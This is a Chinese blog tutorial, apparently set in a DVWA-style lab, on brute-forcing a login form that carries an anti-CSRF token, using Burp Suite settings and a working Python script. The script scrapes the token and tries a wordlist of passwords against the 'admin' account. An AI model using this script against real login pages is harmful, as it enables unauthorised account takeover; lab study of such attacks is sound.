浅谈带有token的穷举攻击方式

最新推荐文章于 2023-12-27 17:14:42 发布
最新推荐文章于 2023-12-27 17:14:42 发布
阅读量184 收藏 2
点赞数 1
分类专栏: # web安全 文章标签: python web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/129040747
版权
本文介绍了如何利用BurpSuite进行穷举攻击,包括重定向和正则匹配,以及通过Python脚本来自动化执行。脚本示例展示了如何读取字典文件,维持会话,获取并使用user_token进行登录尝试,如果找到正确密码则终止程序。
摘要由CSDN通过智能技术生成

目录

burp穷举

python脚本穷举

burp穷举

重定向跳转

叉子模式

正则匹配

设置线程 

初始token 

 模式选择

排序 

python脚本穷举

user_token

post数据会拿着user_token去提交

脚本如下

import requests
import re
url = "url"
def login(password):
   session = requests.session()
   req = session.get(url)
   user_token = re.search("[a-z0-9]{32}", req.text).group(0)
   data = {"username": "admin", "password": password, "Login": "Login", 'user_token': user_token}
   req = session.post(url=url, data=data, allow_redirects=True)
   return req.text
with open("C:/Users\\admin\Desktop\CTF\字典\\top1000.txt","r",encoding="UTF-8") as p:
    passlist = p.readlines()
for cont in passlist:
    cont = cont.strip("\n")
    if 'File Upload' in login(cont):
        print("密码是  %s " % cont)
        break

代码分析

使用with open (),不需要写close语句,默认自动帮我们关闭文件

读取字典内容并去除换行符,将每行内容送入login函数

在login函数里先用session维持一个会话,再通过session句柄发起一个get请求访问该网站,通过正则匹配找到源代码中的32位的token,设置post需要的data参数,allow_redirects 参数,这个参数是指明在请求的时候是否允许重定向,通过session发起一个post请求并返回重定向后页面的源代码

判断如果登录成功后的File Upload在返回的源代码中,就输出密码并结束程序

效果展示 

coleak
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
深入浅出区块链
GitChat
04-12 3882
内容简介 2017年,是区块链爆发又冷静的一年。 如果你持续关注过区块链技术,这一年可能已经对没完没了的概念介绍、前景描绘、行业探讨和链圈新闻产生了审美疲劳。没错,区块链必须与行业紧密结合,它也有颠覆人类协作方式之洪荒巨力,但是说到底它还是一个技术活,是要写代码的,在咖啡厅里整天坐而论道是造不出金链子来的。 本期我们梳理了2017年区块链发展现状,从关键技术原理与实际应用出发,带你深入浅出探索区块...
2018春招前端面试: 闯关记(精排精校) | 掘金技术征文
CRPER
03-13 6482
前言 去年年末研发组解散失业, so选择回去学车了,也顺利拿到了驾照 最近回归大深圳….开始踏上漫漫的找工作之路; “拉勾上吊一百年不匹配!!!”,”BOSS直聘日夜没反应!!!” 题目范围涵盖我最近遇到的笔试题和面谈的(CSS/JS/HTTP/Node/Hybrid/Vue/NG/React) emm…..这里不列举哪些公司了, 若是你完整的阅读一...
暴力穷举
u013240812的专栏
05-09 1919
暴力除法 题目描述 输入正整数n,按从小到大的顺序输出所有形如abcde/fghij=n的表达式,其中a~j恰好为数字0~9的一个排列,2 输入 输入包括多行,每行一个正整数n,2 输出 针对每个输入的n,从小到大输出该表达式,若没有表达式可以生成,则不输出。 样例输入 62 样例输出 79546/01283=62 94736/01528=62
2017-2018-1 201552228 《密码分析学》 实验一 对分组密码的穷举攻击算法
weixin_30307921的博客
12-15 754
2017-2018-1 201552228 对分组密码的穷举攻击算法 算法概要:创新性地提出基于英文字母频率的稳定性,通过读取经过随机全排列处理的文本材料的英文字母来产生的随机序列作为穷举攻击的密钥 我们以DES算法为例对穷举攻击算法进行说明 DES算法采用64位主密钥,那么主密钥的密钥空间的密钥个数就是2^64,对每一个密钥的取值进行尝试是不现实的,因为计算机的运算能力有限,故从密钥空间中选取2...
加密程序设计与防范穷举攻击——密码转义法
sjd163的专栏
01-01 2423
         本方法旨在有效扼制穷举法(暴力破解)的攻击,使其难于实施。         现在普遍的密码输入形式,是输入一些字母、符号、数字或汉字作为密码,有些甚至只输入些数字,转义法是将一些密码元素赋予新的含义,例如字符a,你可以定义是某个整形数98765,当程序进行密码处理的时候将a作为98765进行处理,这样原来的a从代表97(ASCII码值),一下子增加了数千倍,信息量也随之扩大。对穷
黑客常用的攻击方法及流程
最新发布
ytt0523_com的博客
12-27 2188
分布式拒绝服务(Distributed Denial of Service,DDoS)攻击,是使用网络上两个或两个以上被攻陷的计算机作为“僵尸”向特定的目标发动“拒绝服务”式攻击。这种攻击是以DoS攻击为基础,但是效果要比DoS攻击强很多。
接口安全设计:使用token+sign+时间戳,防止中间人和dos攻击
TL_ATC的博客
01-24 5175
在代码层面,对接口进行安全设计一、使用token进行用户身份认证二、使用sign防止传入参数被篡改三、用时间戳防止暴力请求 一、使用token进行用户身份认证 用户身份认证的流程图如下: 具体说明如下: 1、用户登录时,客户端请求接口,传入用户名和密文的密码 2、后台服务对用户身份进行验证。若验证失败,则返回错误结果;若验证通过,则生成一个随机不重复的token,并将其存储在redis中,设置一个过期时间。其中,redis的key为token,value为验证通过后获得的用户信息 3、用户身份校验通过后,
NISP
极光时流
07-21 2775
NISP七月份练习01 文章目录NISP七月份练习01NISP七月份练习02NISP七月份练习03NISP七月份练习04NISP七月份练习05NISP七月份练习06NISP七月份练习07NISP七月份练习08NISP七月份练习09NISP七月份练习10NISP七月份练习11NISP七月份练习12NISP七月份练习13NISP七月份练习14NISP七月份练习15NISP七月份练习16NISP七月份练习17NISP七月份练习18 1我国的( )主要规定了关于数据电文、电子签名与认证及相关的法律责任 A.《中华人
前端面试总结三
我是谁的博客
10-26 1058
离线资源 前端兼容 CSS3 GPU加速 SPDY协议 单页面应用 GZIP压缩 CSS表达式和CSS滤镜 HTTP长连接、短连接 安全 重点: 类 安全、csrf、xss Vue原理 vuex vue-router的两种模式及区别 webpack是什么,用过什么 ...
delphi控件使用
achs24540的博客
10-27 2352
Standard页 1- Tlistbox控件 重要属性items.* 举例,界面设计如下左,执行结果如下右: 代码为 procedure TForm1.Button1Click(Sender: TObject); begin edit1.Text := listbox1.Items.CommaText; edit2.Text := listbo...
Python安全测试攻击实战
测试萌萌
05-24 2370
在本文中,我们将使用Python进行一次安全测试的实战演练,目标是找出并利用应用程序的安全漏洞。请注意,这个演练仅用于教育和研究目的,切勿将这些技术用于非法活动。 注意:未经授权的攻击是违法的。确保你在拥有明确权限的环境中执行这些攻击,例如在你自己的应用或经过明确授权的应用上进行。
信息安全复习三:古典密码之设计好的密码算法
qq_51184727的博客
04-24 1509
无条件安全:是指我们假设攻击者有无限的时间,有无限的计算机资源,它也不能够解密,不能够攻破的密码算法。计算机上安全:是指我们假设攻击者的时间是有限的,攻击者的计算资源是有限的情况下,无法解密。Playfair是一次加密双字母组合,也就是我们把明文分组的时候,2个字母为一组。Playfair是惠斯通发明的,配合他发明的电报机一起使用,当要发送一个字母G的时候,黄色的指针偏转,指向字母G。维吉尼亚密码是一种使用多表代换的代换密码,是在凯撒密码的基础上扩展出来的多表密码。为了生成密码,需要使用表格法。
网络安全----密码学
juggte的博客
11-16 6455
密码学 数据有哪些安全需求? 需确保数据的保密性、完整性、不可否认性和可认证性。 基础是现代密码学。 通过加密将可读的信息变换成不可理解的乱码,从而起到保护信息的作用。 密码学的发展史 自人类社会出现战争便产生了密码 ,Phaistos圆盘,一种直径约为 160mm的Cretan-Mnoan粘土圆盘, 始于公元前17世纪。表面有明显字间 空格的字母,至今还没有破解。 1834年,伦敦大学的实验物理学教授惠斯顿发明了电机,这 是通信向机械化、电气化跃进的开始,也为密码通信采用在线 加密技术提
常见攻击原理与技术分析
小旺的博客
05-21 1676
黑客攻击原理与技术 黑客的概念 “黑客”一词是英语Hacker的音译,是指拥有高深的计算机及网络知识,能够躲过系统安全控制,进入或破坏计算机系统或网络的非法用户。 攻击发展历程 黑客术语 1.肉鸡 所谓“肉鸡”是一种很形象的比喻。它比喻那些可以随意被攻击者控制的计算机。受害者可以是Windows操作系统,也可以是UNIX/Linux操作系统,可以是普通的个人计算机,也可以是大型的服务器,攻击者可以像操作自己的计算机那样来操作它们,而不被受害者所发觉。 2.木马 木马就是那些表面上正常,但是一旦运行,就会获
密码学基础
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-28 3357
文章目录一、密码学分类1、密码编码学:1)对称密码体制:2)非对称密码体制:2、密码分析学3、保密体制及其安全性:1)密码体制六元组2)保密体制的安全性:4、认证体制及其安全性:1)认证体制模型2)认证体制的安全性二、香农理论1、概率论基础:2、熵及其性质:3、信息论与保密系统的关系:三、攻击密码体制的常用方法:1、穷举攻击:2、统计分析攻击3、数学分析攻击:四、复杂性理论 一、密码学分类 密码学是研究信息及信息系统安全的科学,它起源于保密通信技术。分为密码编码学和密码分析学。研究如何对信息编码以实现信息通
信息安全概论
渴望飞的鱼的博客
05-25 3827
信息安全概论
基于 token 的多平台身份认证架构设计
程序员闪充宝
02-28 167
点击上方蓝色字体,选择“标星公众号”优质文章,第一时间送达作者 |哈莫链接 | cnblogs.com/beer/p/6029861.html1、概述在存在账号体系的信息系统中,对身份...
关于JSON Web Token攻击
qq_40223049的博客
12-10 1200
关于JSON Web Token攻击Json Web TokenJWT的构成对JWT的相关攻击记录常用工具原理CTF记录案例记录推荐参考文章 Json Web Token Json Web Token简称JWT,是基于JSON开发标准与token鉴权机制将验证信息存放在客户端,通过请求附加验证信息向服务器请求验证并返回数据的认证方法。其对分布式站点的单点登陆有较高的效率。 JWT的构成 JWT通...
网站攻击的三种手段及预防方法
青春微凉、不悲伤℃
12-23 5210
网站被攻击,在当下屡见不鲜,并且目前的网络攻击模式各种各样,让人防不胜防。在这种情况下,知道一些常见的网站攻击的方法就显得尤为重要了,这对于我们维护好网站,防范网站侵犯具有一定的积极作用。在这里,小编总结了3种常见的网站攻击的方法及预防措施,供大家参考。        1、恶意攻击        恶意攻击通常有两种,一种是get方式,一种是post方式。        Get方式,俗称肉鸡攻
企业项目代码测试postman带有token
08-23
通过以上步骤,就可以在Postman中进行带有Token接口测试了。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* [如何使用postman带Token测试接口?]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值